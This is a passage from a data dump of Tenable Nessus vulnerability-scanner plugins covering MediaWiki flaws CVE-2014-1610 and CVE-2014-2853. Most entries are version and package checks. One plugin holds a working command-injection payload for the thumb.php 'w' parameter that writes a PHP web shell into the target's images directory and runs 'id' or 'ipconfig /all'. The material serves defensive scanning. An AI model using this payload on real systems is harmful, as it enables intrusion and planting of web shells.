Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1058981\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-February/127948.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?be80f243\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mediawiki package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"MediaWiki thumb.php page Parameter Remote Shell Command Injection\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MediaWiki Thumb.php Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mediawiki\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/01/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/01/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"mediawiki-1.21.5-1.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mediawiki\");\n}\n", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-04-16T14:01:49", "description": "The version of MediaWiki running on the remote host is affected by a remote command injection vulnerability due to a failure to properly sanitize user-supplied input to the 'w' parameter in the 'thumb.php' script. 
A remote, unauthenticated attacker can exploit this issue to execute arbitrary commands and/or execute arbitrary code on the remote host.\n\nNote that the application is also affected by an additional command injection issue. However, Nessus has not tested for this additional issue.\n\nNote also that PDF file upload support and the PdfHandler extension must be enabled in order to exploit this issue.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2014-02-21T00:00:00", "type": "nessus", "title": "MediaWiki thumb.php 'w' Parameter Remote Shell Command Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:mediawiki:mediawiki"], "id": "MEDIAWIKI_THUMB_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/72618", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72618);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-1610\");\n script_bugtraq_id(65223);\n script_xref(name:\"EDB-ID\", value:\"31329\");\n\n script_name(english:\"MediaWiki thumb.php 'w' Parameter Remote Shell Command Injection\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains an application that is affected by a\nremote command injection vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of MediaWiki running on the remote host is affected by a\nremote command injection vulnerability due to a failure to properly\nsanitize user-supplied input to the 'w' parameter in the 'thumb.php'\nscript. 
A remote, unauthenticated attacker can exploit this issue to\nexecute arbitrary commands and/or execute arbitrary code on the remote\nhost.\n\nNote that the application is also affected by an additional command\ninjection issue. However, Nessus has not tested for this additional\nissue.\n\nNote also that PDF file upload support and the PdfHandler extension\nmust be enabled in order to exploit this issue.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2014/Feb/6\");\n # https://www.checkpoint.com/threatcloud-central/articles/2014-01-28-tc-researchers-discover.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f8ca1fc8\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mediawiki.org/wiki/Release_notes/1.19\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mediawiki.org/wiki/Release_notes/1.21\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mediawiki.org/wiki/Release_notes/1.22\");\n # https://lists.wikimedia.org/pipermail/mediawiki-announce/2014-January/000140.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?92483abd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MediaWiki 1.19.11 / 1.21.5 / 1.22.2 or later, and update\nthe PdfHandler extension to the latest available version.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-1610\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", 
value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"MediaWiki thumb.php page Parameter Remote Shell Command Injection\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MediaWiki Thumb.php Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mediawiki:mediawiki\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"mediawiki_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"installed_sw/MediaWiki\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\ninclude(\"url_func.inc\");\n\napp = \"MediaWiki\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port\n);\ndir = install['path'];\ninstall_url = build_url(port:port, qs:dir);\n\n# Variables\nfile = NULL;\nurl = \"/images\";\n\nfunction pdf_chk(string)\n{\n local_var item, file;\n item = eregmatch(pattern:'\\\\<a href=\"(.*\\\\.pdf)\"', string:string);\n\n if (isnull(item)) return NULL;\n\n file = item[1];\n return file;\n}\n\nfunction d_listing(string)\n{\n local_var matches, match, item, subdir, subdirs, pat;\n subdirs = make_list();\n pat = 'alt=\"\\\\[DIR\\\\]\"\\\\>.*\\\\<a href=\"([^/].*/)\"\\\\>';\n\n if (egrep(pattern:\"\\<title\\>Index of (.*)\", string:string))\n {\n matches = egrep(pattern:pat, string:string);\n if (matches)\n {\n foreach match (split(matches))\n {\n item = eregmatch(pattern:pat, string:match);\n if (!isnull(item))\n {\n subdir = item[1];\n if (subdir == \"temp/\") continue; #Ignore temp directory\n subdirs = make_list(subdirs, subdir);\n }\n }\n }\n }\n return subdirs;\n}\n\n# Check /images for a directory listing and find an existing PDF\nres = http_send_recv3(\n method : \"GET\",\n port : port,\n item : dir + url,\n exit_on_fail : TRUE,\n follow_redirect : 1\n);\n\nif (egrep(pattern:\"\\<title\\>Index of (.*)/images\\</title\\>\", string:res[2]))\n{\n file = pdf_chk(string:res[2]);\n\n # Get a list of directories and traverse each to look for a PDF\n # Only go 3 levels deep\n if (isnull(file))\n {\n subdirs = d_listing(string:res[2]);\n foreach d1 
(subdirs)\n {\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : dir + url + \"/\" + d1,\n exit_on_fail : TRUE\n );\n if (!isnull(res[2]))\n file = pdf_chk(string:res[2]);\n if (!isnull(file)) break;\n\n subdirs2 = d_listing(string:res[2]);\n foreach d2 (subdirs2)\n {\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : dir + url + \"/\" + d1 + d2,\n exit_on_fail : TRUE\n );\n if (!isnull(res[2]))\n file = pdf_chk(string:res[2]);\n if (!isnull(file)) break;\n\n subdirs3 = d_listing(string:res[2]);\n foreach d3 (subdirs3)\n {\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : dir + url + \"/\" + d1 + d2 + d3,\n exit_on_fail : TRUE\n );\n if (!isnull(res[2]))\n file = pdf_chk(string:res[2]);\n if (!isnull(file)) break;\n }\n if (!isnull(file)) break;\n }\n if (!isnull(file)) break;\n }\n }\n}\n\nif (isnull(file))\n exit(0, \"No PDF files were found in \" + install_url + url);\n\n# Determine which command to execute on target host\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) cmd = 'ipconfig /all';\n else cmd = 'id';\n\n cmds = make_list(cmd);\n}\nelse cmds = make_list('id', 'ipconfig /all');\n\ncmd_pats = make_array();\ncmd_pats['id'] = \"uid=[0-9]+.*gid=[0-9]+.*\";\ncmd_pats['ipconfig /all'] = \"Subnet Mask\";\n\nexp_file = SCRIPT_NAME - \".nasl\" + \"-\" + unixtime();\nr = 0;\n\nforeach cmd (cmds)\n{\n exp_file += r;\n if (cmd == \"id\")\n attack = '/thumb.php?f=' +file+ '&w=5|`echo \"<?php system(id);' +\n 'echo(\\\\\"path=\\\\\"); system(pwd);\">images/' +exp_file+ '.php`';\n else\n {\n attack = '/thumb.php?f=' +file+ '&w=5|echo \"<?php echo(' + \"'<pre>');\" +\n \"system('ipconfig /all');system('dir \" +exp_file+ \".php');\" +\n '//\">images/' +exp_file+ \".php\";\n }\n\n attack = urlencode(\n str : attack,\n unreserved : \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234\" +\n \"56789=+&|.?`;/()-_\"\n );\n\n res = http_send_recv3(\n method : \"GET\",\n 
port : port,\n item : dir + attack,\n exit_on_fail : TRUE\n );\n\n if (\"<h1>Error generating thumbnail</h1>\" >< res[2])\n {\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : dir + url + \"/\" + exp_file + \".php\",\n exit_on_fail : TRUE\n );\n if (egrep(pattern:cmd_pats[cmd], string:res[2]))\n {\n if (cmd == \"id\")\n {\n pwd = strstr(res[2], \"path\");\n output = res[2] - pwd;\n path = chomp(pwd - \"path=\");\n break;\n }\n else\n {\n output = strstr(res[2], \"Windows IP\");\n item = eregmatch(pattern:\"Directory of (.*)\", string:res[2]);\n\n if (!isnull(item))\n {\n path = chomp(item[1]);\n pos = stridx(output, \"Volume in drive\");\n output = substr(output, 0, pos - 1);\n break;\n }\n }\n break;\n }\n }\n r++;\n}\n\nif (strlen(output) > 0)\n{\n security_report_v4(\n port : port,\n severity : SECURITY_WARNING,\n cmd : cmd,\n request : make_list(install_url + attack, install_url + url + \"/\" + exp_file + \".php\"),\n output : chomp(output),\n rep_extra : \n '\\nNote: This file has not been removed by Nessus and will need to'+\n '\\nbe manually deleted (' +path+ ').'\n ); \n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);\n", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-04-16T14:01:04", "description": "According to its version number, the instance of MediaWiki running on the remote host is affected by the following remote code execution vulnerabilities :\n\n - A user-input validation error exists during thumbnail generation in the 'thumb.php' script that allows the execution of arbitrary shell commands via a specially crafted DjVu file.\n\n - A user-input validation error exists in the 'pdfhandler_body.php' script used by the PdfHandler extension that allows the execution of arbitrary shell commands via a specially crafted PDF file.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number. 
Also note that the affected features are not enabled by default.", "cvss3": {"score": null, "vector": null}, "published": "2014-01-30T00:00:00", "type": "nessus", "title": "MediaWiki < 1.19.11 / 1.21.5 / 1.22.2 Multiple Remote Code Execution Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:mediawiki:mediawiki"], "id": "MEDIAWIKI_1_19_11.NASL", "href": "https://www.tenable.com/plugins/nessus/72215", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72215);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-1610\");\n script_bugtraq_id(65223);\n\n script_name(english:\"MediaWiki < 1.19.11 / 1.21.5 / 1.22.2 Multiple Remote Code Execution Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains an application that is affected by\nmultiple remote code execution vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version number, the instance of MediaWiki running\non the remote host is affected by the following remote code execution\nvulnerabilities :\n\n - A user-input validation error exists during thumbnail\n generation in the 'thumb.php' script that allows the\n execution of arbitrary shell commands via a specially\n crafted DjVu file.\n\n - A user-input validation error exists in the\n 'pdfhandler_body.php' script used by the PdfHandler\n extension that allows the execution of arbitrary shell\n commands via a specially crafted PDF file.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number. 
Also\nnote that the affected features are not enabled by default.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2014/Feb/6\");\n # https://www.checkpoint.com/threatcloud-central/articles/2014-01-28-tc-researchers-discover.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f8ca1fc8\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mediawiki.org/wiki/Release_notes/1.19\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mediawiki.org/wiki/Release_notes/1.21\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mediawiki.org/wiki/Release_notes/1.22\");\n # https://lists.wikimedia.org/pipermail/mediawiki-announce/2014-January/000140.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?92483abd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MediaWiki version 1.19.11 / 1.21.5 / 1.22.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-1610\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"MediaWiki thumb.php page Parameter Remote Shell Command Injection\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MediaWiki Thumb.php Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/01/28\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/01/30\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mediawiki:mediawiki\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mediawiki_detect.nasl\");\n script_require_keys(\"Settings/ParanoidReport\", \"installed_sw/MediaWiki\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"MediaWiki\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\nversion = install['version'];\ninstall_url = build_url(qs:install['path'], port:port);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# Check Point says the DjVu issue affects 1.8 onwards.\nif (\n version =~ \"^1\\.[89]\\.\" ||\n version =~ \"^1\\.1[0-8]\\.\" ||\n version =~ \"^1\\.19\\.([0-9]|10)([^0-9]|$)\" ||\n version =~ \"^1\\.21\\.[0-4]([^0-9]|$)\" ||\n version =~ \"^1\\.22\\.[01]([^0-9]|$)\"\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed versions : 1.19.11 / 1.21.5 / 1.22.2' +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, 
app, install_url, version);\n", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:51:17", "description": "- Update to 1.21.5\n\n - (bug 60339) (CVE-2014-1610) SECURITY: Reported RCE in djvu thumbnailing\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-02-07T00:00:00", "type": "nessus", "title": "Fedora 19 : mediawiki-1.21.5-1.fc19 (2014-1802)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:mediawiki", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2014-1802.NASL", "href": "https://www.tenable.com/plugins/nessus/72379", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-1802.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72379);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-1610\");\n script_bugtraq_id(65223);\n script_xref(name:\"FEDORA\", value:\"2014-1802\");\n\n script_name(english:\"Fedora 19 : mediawiki-1.21.5-1.fc19 (2014-1802)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Update to 1.21.5\n\n - (bug 60339) (CVE-2014-1610) SECURITY: Reported RCE in\n djvu thumbnailing\n\nNote that Tenable Network Security has extracted the preceding\ndescription block 
directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1058981\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-February/127942.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b4c47368\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mediawiki package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"MediaWiki thumb.php page Parameter Remote Shell Command Injection\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MediaWiki Thumb.php Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mediawiki\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/01/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/01/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"mediawiki-1.21.5-1.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mediawiki\");\n}\n", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-04-16T14:03:23", "description": "According to its version number, the instance of MediaWiki running on the remote host is affected by a cross-site scripting vulnerability. A flaw exists with 'sortKey' in the 'InfoAction.php' script. 
This allows a remote attacker to execute arbitrary code within the server and browser trust relationship.\n\nNessus has not tested for this issue but has instead relied on the application's self-reported version number.", "cvss3": {"score": null, "vector": null}, "published": "2014-05-01T00:00:00", "type": "nessus", "title": "MediaWiki < 1.21.9 / 1.22.6 'InfoAction.php' XSS", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-2853"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:mediawiki:mediawiki"], "id": "MEDIAWIKI_1_21_9.NASL", "href": "https://www.tenable.com/plugins/nessus/73804", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73804);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-2853\");\n script_bugtraq_id(67068);\n\n script_name(english:\"MediaWiki < 1.21.9 / 1.22.6 'InfoAction.php' XSS\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains an application that is affected by a\ncross-site scripting vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version number, the instance of MediaWiki running on\nthe remote host is affected by a cross-site scripting vulnerability. A\nflaw exists with 'sortKey' in the 'InfoAction.php' script. 
This allows\na remote attacker to execute arbitrary code within the server and\nbrowser trust relationship.\n\nNessus has not tested for this issue but has instead relied on the\napplication's self-reported version number.\");\n # https://lists.wikimedia.org/pipermail/mediawiki-announce/2014-April/000149.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?86d2377c\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mediawiki.org/wiki/Release_notes/1.21\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mediawiki.org/wiki/Release_notes/1.22\");\n script_set_attribute(attribute:\"see_also\", value:\"https://phabricator.wikimedia.org/T65251\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MediaWiki version 1.21.9 / 1.22.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/01\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mediawiki:mediawiki\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable 
